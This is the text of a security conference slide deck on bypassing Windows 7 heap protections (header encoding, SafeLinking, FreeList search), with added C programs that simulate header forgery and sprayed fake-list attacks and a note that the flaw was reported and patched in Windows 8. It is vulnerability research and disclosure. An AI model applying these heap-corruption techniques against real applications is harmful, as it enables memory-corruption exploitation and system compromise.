As @nicowaisman mentioned in his talk Aleatory Persistent Threat, old-school heap-specific exploitation is dying, and with each Windows SP or new version it gets harder to attack the heap itself: heap management adapts quickly and picks up new mitigation techniques. But sometimes it is better to rethink the idea behind a mitigation and implement the technique properly; even a half version of it, done right, covers all known heap exploitation techniques…
1. How safe is your link ?
Old school exploitation
vs
new mitigations
2. • Peter Hlavatý
• Specialized Software Engineer at ESET
• Points of interest :
• vulnerability research
• exploit mitigations
• kernel development
• bootkit research
• malware detection and removal algo
• @zer0mem
• research blog : http://zer0mem.sk/
#whoami
3. • As Nico mentioned in his talk, Aleatory Persistent Threat, old-school
heap-specific exploitation is dying
• windows version ++ means attack difficulty ++
• weak implementation == a place to exploit the mechanism itself
Introduction
5. Quick look at the RtlpAllocateHeap FreeLists unlink / search algorithm
Some security improvements in the algorithm are obvious:
• Validating / Encoding headers
• RtlpAnalyzeHeapFailure
• SafeLinking
6. • code1 = _Heap.EncodeFlagsMask ? code1 ^ _Heap.Encoding.Code1 : code1
• valid = code1.Flags ^ (BYTE)code1.Size ^ (code1.Size >> 8) == code1.SmallTagIndex
• size = code1.Size
• _Heap.EncodeFlagsMask initially set to a default value
• _Heap.Encoding.Code1 set to random value
I.Validating / Encoding headers
7. • cs:RtlpDiSableBreakOnFailureCookie
• x64 by default, x86 not!
• x86 Windows binaries by default
• What about 3rd party ?
• RtlpGetModifiedProcessCookie : calls NtQueryInformationProcess
II. RtlpAnalyzeHeapFailure
8. • heap_entry.flink.blink != heap_entry.blink.flink ||
heap_entry.flink.blink != heap_entry
• Pretty easy check, don't you think ?
III. SafeLinking
13. RULING UNDER ENCODING LOGIC
• LowerBoundary of HEAP_ENTRY.Size :
• Interesting test :
_Heap.EncodeFlagsMask & HEAP_ENTRY.Code1
• If it does not match, the header is not XORed at all!
• What about a 0-size chunk ?
Implementation shortcut
14. RULING UNDER ENCODING LOGIC
• UpperBoundary (I.) of HEAP_ENTRY.Size :
• Interesting XORing value :
_Heap.Encoding.Code1 set to a random value
• in this case too much randomness == too much predictability
• If HEAP_ENTRY.Size is set to 0101010101010101b,
then (_Heap.Encoding.Code1 ^ HEAP_ENTRY.Size)
has a high probability of being a big number
Implementation shortcut
15. RULING UNDER ENCODING LOGIC
• UpperBoundary (II.) of HEAP_ENTRY.Size :
• based on XOR
• two heap_entry chunks on the freelist
• 1st : set HEAP_ENTRY.Size to 0x8000
• 2nd : set HEAP_ENTRY.Size to 0x0
• After the XOR, one of the two decoded HEAP_ENTRY.Size values is guaranteed
to have bit 15 set, i.e. to be at least 0x8000, which is a big number
Implementation shortcut
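The header encoding from slide 6 and the two shortcuts from slides 13 and 15, as an added C simulation written for this page (not code from the talk and not ntdll's implementation). The field layout of the first dword (Size:16, Flags:8, SmallTagIndex:8), the default EncodeFlagsMask value 0x100000, the xorshift key generator and the assumption that the key's own tag byte satisfies the checksum are assumptions of this model:

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Model of the Windows 7 HEAP_ENTRY header encoding as the slides describe it.
 * The field layout of the first dword (Size:16, Flags:8, SmallTagIndex:8), the
 * default EncodeFlagsMask 0x100000 and the key generator are assumptions of
 * this simulation, not values taken from a live ntdll. */
typedef union {
    uint32_t code1;
    struct {
        uint16_t size;
        uint8_t  flags;
        uint8_t  small_tag_index;
    } f;
} entry_code1;

typedef struct {
    uint32_t encode_flags_mask;  /* _Heap.EncodeFlagsMask */
    uint32_t encoding_code1;     /* _Heap.Encoding.Code1, random per heap */
} heap_encoding;

#define ENCODE_FLAGS_MASK 0x100000u  /* assumed default: bit 4 of Flags */

/* The validation from slide 6: Flags ^ (BYTE)Size ^ (Size >> 8) == SmallTagIndex */
static uint8_t checksum(uint16_t size, uint8_t flags) {
    return (uint8_t)(flags ^ (uint8_t)size ^ (uint8_t)(size >> 8));
}

/* Stand-in for the random per-heap key (xorshift32 from a seed).  The mask bit
 * is forced on so that every genuine encoded header carries it, and the key's
 * own tag byte is made self-consistent (an assumption of this model). */
static heap_encoding make_heap_encoding(uint32_t seed) {
    entry_code1 k;
    uint32_t x = seed ? seed : 0x9e3779b9u;
    x ^= x << 13; x ^= x >> 17; x ^= x << 5;
    k.code1 = x | ENCODE_FLAGS_MASK;
    k.f.small_tag_index = checksum(k.f.size, k.f.flags);
    heap_encoding h = { ENCODE_FLAGS_MASK, k.code1 };
    return h;
}

/* What the allocator stores in memory for a chunk header. */
static uint32_t encode_header(const heap_encoding *h, uint16_t size, uint8_t flags) {
    entry_code1 e;
    e.f.size = size;
    e.f.flags = flags;
    e.f.small_tag_index = checksum(size, flags);
    return h->encode_flags_mask ? (e.code1 ^ h->encoding_code1) : e.code1;
}

/* Decode + validate the way slide 13 describes RtlpAllocateHeap doing it:
 * the XOR is applied only if (EncodeFlagsMask & Code1) is non-zero. */
static bool decode_header(const heap_encoding *h, uint32_t raw, uint16_t *size_out) {
    entry_code1 e;
    e.code1 = (h->encode_flags_mask & raw) ? (raw ^ h->encoding_code1) : raw;
    if (checksum(e.f.size, e.f.flags) != e.f.small_tag_index)
        return false;
    *size_out = e.f.size;
    return true;
}

/* Lower boundary (slide 13): an overwritten header with the mask bit clear is
 * never XORed, so the attacker picks the decoded Size without knowing the key,
 * Size == 0 included. */
static bool forge_plaintext_header(const heap_encoding *h, uint16_t wanted, uint16_t *seen) {
    entry_code1 raw;
    raw.f.size = wanted;
    raw.f.flags = 0x00;                       /* mask bit 0x10 left clear */
    raw.f.small_tag_index = checksum(wanted, 0x00);
    return decode_header(h, raw.code1, seen) && *seen == wanted;
}

/* Upper boundary (slide 15): two overwritten headers that DO get decoded, with
 * raw Size 0x8000 and 0x0.  The checksum is XOR-linear so both still validate,
 * and whatever the key is exactly one decoded Size has bit 15 set (>= 0x8000). */
static bool forge_large_size_pair(const heap_encoding *h, uint16_t *s1, uint16_t *s2) {
    entry_code1 a, b;
    a.f.size = 0x8000; a.f.flags = 0x10; a.f.small_tag_index = checksum(0x8000, 0x10);
    b.f.size = 0x0000; b.f.flags = 0x10; b.f.small_tag_index = checksum(0x0000, 0x10);
    if (!decode_header(h, a.code1, s1) || !decode_header(h, b.code1, s2))
        return false;
    return (*s1 >= 0x8000) != (*s2 >= 0x8000);
}

int main(void) {
    heap_encoding h = make_heap_encoding(0x1234567u);
    uint16_t size = 0, s1 = 0, s2 = 0;
    bool ok = decode_header(&h, encode_header(&h, 0x20, 0x00), &size);
    printf("genuine header: valid=%d size=0x%x\n", ok, size);
    printf("plaintext forgery with Size 0: %d\n", forge_plaintext_header(&h, 0, &size));
    ok = forge_large_size_pair(&h, &s1, &s2);
    printf("XOR pair: one big size=%d (0x%x, 0x%x)\n", ok, s1, s2);
    return 0;
}
```

The two forgeries need no knowledge of the per-heap key: the first avoids the decode step entirely, the second relies on the checksum being an XOR of the same bytes that the key XORs, so a self-consistent raw header decodes to a self-consistent one. Both come down to the mask test and the linear checksum, which is the "implementation shortcut" the slides point at.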
18. • SafeLink check
• a heap-sprayed fake list fulfils the conditions
• Validation & RtlpAnalyzeHeapFailure ?
• I am a 3rd party
• Problems :
• works only for x86 binaries
• already fixed in win7sp1
Results ?
22. • Again, no validation is required here
• Performance vs security ?
RtlpFreeHeap search in FreeLists
23. Improving the previous idea ..
• What do you think happens to a valid chunk whose size is bigger than the size of
the already overwritten HEAP_ENTRY when an attempt is made to free it ?
26. • Same as in the first attack :
• HeapSpray attack
• sizeof(HEAP_ENTRY) + sizeof(LIST_ENTRY->Flink)
overflow that overwrites a HEAP_ENTRY on the FreeList
• Second-attack specific :
• Ability to force the application to free already used 'good sized'
memory (memory leak)
• RW access to our heap-sprayed buffer (relinking)
Prerequisites
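The two FreeList attacks (slide 18: the allocator's walk is steered into a sprayed fake list that passes the slide 8 SafeLink check; slides 22-26: the unvalidated RtlpFreeHeap insertion walk writes a pointer through a fake entry's Blink), as an added C simulation written for this page, not code from the talk and not ntdll's own algorithm. Header encoding, ListHints and the real HEAP_ENTRY layout are left out; the `FREE_CHUNK` type, the first-fit walk and the `target` location are assumptions of this model:

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Model of a Windows FreeList: a circular doubly-linked list of free chunks
 * kept in ascending size order.  Header encoding is ignored; only the linking
 * logic discussed on the slides is modelled. */
typedef struct list_entry { struct list_entry *flink, *blink; } LIST_ENTRY;

typedef struct free_chunk {
    uint16_t   size;   /* stands in for HEAP_ENTRY.Size */
    LIST_ENTRY list;   /* the LIST_ENTRY that follows the header in a free chunk */
} FREE_CHUNK;

#define CHUNK_OF(le) ((FREE_CHUNK *)((char *)(le) - offsetof(FREE_CHUNK, list)))

static void freelist_init(LIST_ENTRY *head) { head->flink = head->blink = head; }

/* Free path (slide 22): walk to the first entry that is not smaller than the
 * chunk being freed and link in front of it.  No pointer validation at all. */
static void freelist_insert(LIST_ENTRY *head, FREE_CHUNK *c) {
    LIST_ENTRY *pos = head->flink;
    while (pos != head && CHUNK_OF(pos)->size < c->size)
        pos = pos->flink;
    c->list.flink = pos;
    c->list.blink = pos->blink;
    pos->blink->flink = &c->list;   /* writes through whatever pos->blink holds */
    pos->blink = &c->list;
}

/* SafeLink check from slide 8, then the classic unlink. */
static bool safe_unlink(LIST_ENTRY *e) {
    if (e->flink->blink != e->blink->flink || e->flink->blink != e)
        return false;               /* RtlpAnalyzeHeapFailure territory */
    e->flink->blink = e->blink;
    e->blink->flink = e->flink;
    return true;
}

/* Allocation path: first-fit search of the FreeList; the safe-unlink check is
 * the only protection on the entry that gets handed out. */
static FREE_CHUNK *freelist_alloc(LIST_ENTRY *head, uint16_t size) {
    for (LIST_ENTRY *pos = head->flink; pos != head; pos = pos->flink) {
        if (CHUNK_OF(pos)->size >= size)
            return safe_unlink(pos) ? CHUNK_OF(pos) : NULL;
    }
    return NULL;
}

/* Attacker side: a sprayed fake chunk whose Flink (and, unless overridden,
 * Blink) point at itself satisfies e->flink->blink == e->blink->flink == e. */
static void spray_fake_chunk(FREE_CHUNK *fake, uint16_t size, LIST_ENTRY *blink) {
    fake->size = size;
    fake->list.flink = &fake->list;
    fake->list.blink = blink ? blink : &fake->list;
}

/* Scenario A (slide 18): the overflow rewrites the header and Flink of a free
 * chunk, so the allocator's walk steps into the spray and returns the fake. */
static bool attack_alloc_returns_fake(void) {
    LIST_ENTRY head; FREE_CHUNK victim, fake;
    freelist_init(&head);
    victim.size = 0x40;
    freelist_insert(&head, &victim);
    spray_fake_chunk(&fake, 0x1000, NULL);
    victim.size = 0;                 /* overflow: forged header ... */
    victim.list.flink = &fake.list;  /* ... plus sizeof(Flink) bytes */
    return freelist_alloc(&head, 0x100) == &fake;
}

/* Scenario B (slides 22-26): same corruption, but the application frees a
 * valid chunk bigger than the forged size.  The unvalidated insert walks into
 * the spray and writes &freed->list through fake.Blink, which the attacker
 * pointed at an address of their choosing (here: target). */
static bool attack_free_writes_pointer(LIST_ENTRY *target) {
    LIST_ENTRY head; FREE_CHUNK victim, fake, freed;
    freelist_init(&head);
    victim.size = 0x40;
    freelist_insert(&head, &victim);
    target->flink = target->blink = NULL;
    spray_fake_chunk(&fake, 0x1000, target);
    victim.size = 0;
    victim.list.flink = &fake.list;
    freed.size = 0x80;               /* the "good sized" chunk the app frees */
    freelist_insert(&head, &freed);
    return target->flink == &freed.list;
}

int main(void) {
    LIST_ENTRY target;
    printf("alloc returns sprayed fake chunk: %d\n", attack_alloc_returns_fake());
    printf("free writes heap pointer to target: %d\n", attack_free_writes_pointer(&target));
    return 0;
}
```

Scenario A gives the attacker an allocation inside memory they already control; scenario B plants a heap pointer at a chosen address and leaves the freed chunk linked into the sprayed list, which is the "relinking" prerequisite on slide 26. The fix described on slide 35 corresponds to validating every entry the `while` loop in `freelist_insert` steps over, not only the one that is finally unlinked.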
34. • Conclusions :
• Mitigations are only as good as their weakest point !
• Implement a minimalistic approach, but cover all responsibilities
of the code
• Speed / performance < a safe environment
Done
35. • Reported to Microsoft about 2 years ago
• But still present in win7sp1, and was usable even in win8CP !
• In the final release of win8 it is finally patched!
• The FreeList search algorithm now validates each walked
HEAP_ENTRY
Additional technique info
37. References
Brett Moore: Exploiting Freelist[0] On XP Service Pack 2
http://www.orkspace.net/secdocs/Windows/Protection/Bypass/Exploiting%20Freelist%5B0%5D%20On%20XP%20Service%20Pack%202.pdf
Chris Valasek: Understanding the Low Fragmentation Heap
http://illmatics.com/Understanding_the_LFH.pdf
Brett Moore: Heaps About Heaps
http://seclists.org/vuln-dev/2008/Jul/0
Alexander Sotirov: Heap Feng Shui in JavaScript
http://www.blackhat.com/presentations/bh-europe-07/Sotirov/Presentation/bh-eu-07-sotirov-apr19.pdf
Nico Waisman: Aleatory Persistent Threat
http://media.blackhat.com/bh-us-10/presentations/Waisman/BlackHat-USA-2010-Waisman-APT-slides.pdf
… and many other useful materials on exploit techniques …
Speaker notes
Outline: "I will start by reviewing the checks performed by SafeLink and the processing - (un)validating of the block headers. Following that, I will present the approach which can be used to satisfy the conditions of the linking/un-linking algorithm, and rule encoding mitigations as well. As the next step I will show a less strict approach which satisfies the exploitation conditions of most x86 binaries. After that, I will look deeper at the conditions to fully compromise even an x64 application on win7sp1 (/win8CP), present the idea, look at the results and show a live demo on win7sp1 - x64 application. Some conclusions follow. At the end of the talk, I will show a video demo of exploitation of a vulnerable proof-of-concept application (win8 x64, x86 plugin for IE, IE10)."